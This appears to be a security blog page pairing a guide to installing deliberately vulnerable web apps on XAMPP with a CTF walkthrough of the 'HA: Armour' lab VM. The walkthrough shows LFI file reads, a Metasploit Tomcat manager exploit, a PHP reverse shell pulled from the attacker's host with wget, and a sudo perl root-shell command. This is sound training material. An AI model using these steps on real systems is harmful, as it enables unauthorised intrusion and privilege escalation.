Web Application Lab Setup on Windows

Web Application Lab Setup on Windows

Hello friends! Today we are going to show you how you can set up a vulnerable web application server in Windows system using Xampp. Here we will be configuring the most popular web applications (DVWA, bwapp, SQLI, Mutillidae). So, let's do that.

Table of Content

Requirement

·        Web application

·        Xampp Server Installation in Windows

·        DVWA

·        bWAPP

·        Sqli

·        Mutillidae

Requirement-Xampp server (Windows-X64)

Web Application

A web application is a computer program that utilizes web browsers and web technology to perform tasks over the Internet. Web apps can be built for a wider use which can be used by anyone; from an enterprise to an entity for a variety of reasons. Frequently used Web applications can include webmail.

Xampp Server Installation

 XAMPP stand for Apache + MariaDB + PHP + Perl

XAMPP is a free and open-source cross-platform web server solution stack package developed by Apache Friends, consisting mainly of the Apache HTTP Server, MariaDB database, and interpreters for scripts written in the PHP and Perl programming languages. Since most actual web server deployments use the same components as XAMPP, it makes transitioning from a local test server to a live server possible. (read more from wikipedia)

Download from here

Once the installation is done, we need to start the service of Mysql and Apache service in Xampp server.

DVWA

DVWA is a web application that is damn sensitive to PHP / MySQL. The main objectives are to provide security professionals with assistance to test their skills and resources in a legal environment, enable web developers to better understand the processes of protecting web applications and assist teachers / students to teach / learn protection in the classroom.

Download from here

Once the dvwa is installed completely then we will navigate to C:/Xampp/htdocs/dvwa/config.inc.php.dist to change the username and password for database.

 Open the configuration file to set the Username and Password.

Now here

You can notice that the default username is root and password is password which we will modify.

Now here you may notice that we have set the password “blank” for user “root” . Now save these settings and quit.

Rename the file as “config.inc.php” after making above changes and save it.

Now we need to open DVWA application in our local host to create the data base.

http://localhost/dvwa/setup.php

Now click on create data base and database is created.

Now click on login and you are done with the set up.

For login, we will use the DVWA username which is admin and password which is DVWA password by default.

Bwapp

Now let’s set up a new lab which is BWAPP.

BWAPP is a free, open source and intentionally unreliable web application, or a web buggy program. It helps security enthusiasts, designers and students discover Web bugs and stop them from doing so. BWAPP plans for positive penetration tests and cyber ethics initiatives.

Download it from here.

Now navigate to “C:/Xampp/htdoc/bwapp/admin” folder to change the default username and password for the database.

Now you can see that the default username is root and password is bug which we will modify.

Now here the username is root and password we have set blank. Now save the settings and quit.

Now let’s open “bwapp/install.php” in the local host and click on “here” to complete the installation.

Now the installation is complete.

When you will login as bee:bug; you will get the portal to test your penetration testing skill

Here you can click on bugs and all bugs will be displayed to you which are there in bwapp web application.

SQLI

SQLi: A facility that provides a robust testing environment for those involved in SQL injection acquisition and enhancement. Let's start. First, we will download SQLI lab through GitHub.

Now we will navigate to C:/htdocs/sqlilabs/sqli-connections to edit the setup-db.php.

Now here we will set the password “blank” and save the changes and then quit.

Now browse this web application from through this URL: localhost/sqli and click on Setup/reset Databases for labs.

Now the sqli lab is ready to use. Now a page will open up in your browser which is an indication that we can access different kinds of Sqli challenges

Now you can see that we have opened lesson 1. So, we have successfully set Sqli labs for practice.

Mutillidae

OWASP Mutillidae is an open source web application that is intentionally vulnerable and actively aims at web security. It's a laboratory for those involved in SQL injection acquisition and development, which offers a full test environment. This internet hacking framework is simple to use and is designed for labs, safety lovers, schools, CTFs and vulnerability assessments.

First, we will navigate to “C:/Xampp/htdocs/mutillidae/includes” to edit the “database-config.php” as shown below.

Here we can see that password is set mutillidae which we will replace with blank.

You can view that we have set the password “blank”. Now save the settings and quit.

Now you can see the page where you need to click on opt out tap.

Now we will open this our local browser by the following URL: localhost/mutillidae where we will find an option of reset database. Just click on it to reset the database. So, In this way, we can setup our vulnerable web application lab for penetration testing.

Now you will be redirected to a page which will ask you to click ok to proceed. Here you need to click on OK and you are done with the configuration of the Mutillidae lab.

We have successfully set all the web applications in Xampp server in Windows.

HA: Armour Walkthrough

This is our Walkthrough for “HA: Armour” and this CTF is designed by Hacking Articles Team 😊, hope you will enjoy this.

TASK: Klaw has stolen some armours from the Avengers Super-Secret Base. Falcon has checked the manifest, following things are unaccountable:

·        HulkBuster Armour

·        Spiderman Armour

·        Ant-Man Armour

·        Black Panther Armour

·        Iron Man Armour

Klaw hide all these armours and now it's up to you. Can you use your penetration skills to recover them all?

Hint: P.S. Klaw has a habit of dividing his passwords into 3 parts and save them at different locations. So, if you get some combine them to move forward.

Level: Intermediate

You can download this lab from here.

Lets Begin!!

Penetration Testing Methodologies

Scanning Network

·        Netdiscover

·        Nmap

Enumeration

·        SSH

·        Abousing HTTP

·        Tftp

·        Dirb

·        LFI

Exploiting

·        Abusing Tomcat Manager (Metasploit)

·        Internal Recon

Privilege Escalation

·        Abusing Apache2.conf

·        Abusing sudo rights

Scanning Network

Firsts of all try to identify our target and for this use the following command:

netdiscover

After you have identified your target using the above command you can start with our second step by scanning the target. You can use nmap to scan the target using the following command:

nmap -p- -A 192.168.1.101

Enumeration

With the help of scanning, you can find that port numbers 80, 8009, 8080 for HTTP (apache http, apache Jserv & apache tomcat) & 65534 for SSH are opened.

You will find the first "HulkBuster" armor when connecting to SSH via port 65534 and the first hint: the Olympics as mentioned above for Klaw.

ssh 192.168.1.101 -p65534

After getting HulkBuster, it was time to dig out another Armor so you can connect to port 80 through a web browser.

Hmmmm! Well, the web page described the Armor Collection of Marvel's famous characters; but you need to dig out more so that you can get a hint.

Ahh!! So, as you can see from the image given below that from inside the source code we found 3 things i.e. “armour, 69 and notes.txt” from inside the comment.

Let’s check each hint one-by-one and identify what it says.

Assuming 69 could be a hint for any port, therefore using nmap again to decide whether or not a service is running on port 69. Therefore, we scan for the UDP protocol and give the following command:

nmap -sU -p69 192.168.1.101

Now, once you know that port 69 is open for tftp operation, you can try connecting to tftp and check the list of available files and directories.

Here you find the notes.txt file, which was mentioned above, so you need to download this file to your local machine.

tftp 192.168.1.101

get notes.txt

From inside notes.txt file, you will get the second amour which is for “Spiderman” and 2^nd Hint:maybeevenawhich was hide by Klaw.

At present you must be having two amours and two hints that we have found till now. To identify third amour or hint we are going to use dirb for brute forcing web directory to enumerate all files with .php extension.

dirb http://192.168.1.101 -X .php

With the of dirb you may find a URL for /file.php page as shown in the below image.

http://192.168.1.101/file.php

But when you browse the /file.php page, you'll see a white color page that's left blank, and it's seriously questionable why the author has left file.php blank.

And if you are aware of the Vulnerabilities web application and its Penetration Testing, then you would have known what kind of misconfiguration it is.

In such a case, it is likely that the host system or application is vulnerable to LFI (Local File Inclusion).

So, without wasting your time, you can try to access /etc/passwd like we did here and say it's vulnerable to LFI.

When you dig more and more then inside /etc/apache2/.htpasswd file you will find the third amour which for “Ant-Man” and along this 3^rd hint: StarBucks.

Now let’s recall the hint given by author:

P.S. Klaw has a habit of dividing his passwords into 3 parts and save them at different locations. So, if you get some combine them to move forward.

So, as you know that till now, we have found all 3 parts of password as Hint1, Hint2 and Hint3; let’s combined them and identify how it will help to move ahead.

http://192.168.1.101/file.php?file=/etc/apache2/.htpasswd

After combining Hint1, Hint2 and Hint3 you will have a password:

TheOlympicsmaybeevenastarBucks

As you know port 8080 is available for Apache tomcat manager and may be can login into tomcat server with the help of this password.

Exploiting Tomcat Manager

For login into tomcat manager we use following credential:

Username: Amour (found above from inside source code)

Password: TheOlympicsmaybeevenastarBucks

I hope you all are aware of Tomcat manager exploit available in Metasploit framework, if not then read complete article from here.

So, without wasting time we are straight away logged into Tomcat Server using Metasploit Tomcat Manager using the above credentials for Tomcat Server Login.

use exploit/multi/http/tomcat_mgr_upload

set rhosts 192.168.1.101

set rport 8080

set httpusername armour

set httppassword TheOlympicsmaybeevenastarBucks

exploit

Booom!! Our favorite meterpreter session is all here, let’s go for Post enumeration.

netstat -antp

If you check your local network static for TCP and UDP connections, you'll see that there's something running 8081, and even nmap doesn't display anything for this. With the aid of the meterpreter, we have forwarded service port 8081 to our local host:8081.

portfwd add -l 8081 -p 8081 -r 127.0.0.1

Once you have forwarding the service over your local machine the you can explore it the web browser as we have done here.

http://127.0.0.1:8081

This will give you the fourth amour for “Black-Panther” 😎

Privilege Escalation

This lab is like Rabbit hole where Enumeration is key for identifying loopholes or further hint. Similarly, we enumerate that /apache2.conf and /html owns writable permission.

Since we know apache2.conf has all permission therefore we’ll try to edit this file for escalating privilege of another user.

This machine has an user profile named as “aarti” that we had enumerated through /etc/passwd and now try to add a user:aarti and group:aarti inside the /etc/apache2/apache2.conf so that we will leverage it for privilege escalation. So, the idea is when we restart the apache service it will get executed with aarti user privileges.

So, we have simple copied the entire content of the apache2.conf file in our local machine and made changes as said above.

Then download the modified apache2.conf from your local machine into the host machine and replaced the original apache2.conf file as we have done here.

As you know the /html has full permission which mean inject the php backdoor in this web directory.  Parallelly we grabbed a php-reverse-shell from /usr/share/webshells/php and modified the listener IP as ours and named it as shell.php.

Then downloaded the shell into /var/www/html folder so that we can access it through browser.

To make the apache service run as aarti user we have to restart the apache service, thus reboot the machine.

cd /var/www/html

wget http://192.168.1.102:8000/shell.php

After reboot is complete, we just executed the shell.php script in the browser and at the same time started a netcat listener on your kali.

nc -lvp 1234

http://192.168.1.101/shell.php

After some time, we got a reverse netcat shell on our local machine for user aarti. Now let’s check sudo rights for this user.

sudo -l

Here you can observe that it shows that user aarti has sudo right to run perl application as root which means we can try to abuse its sudo for escalating root privilege.

sudo perl -e 'exec "/bin/bash";'

Boom!! We have the root shell access, let’s find the fifth and final amour. You can find it inside the /root directory within final.txt.

cd /root

cat final.txt

And the final amour is my favorite “Iron-man” 🤗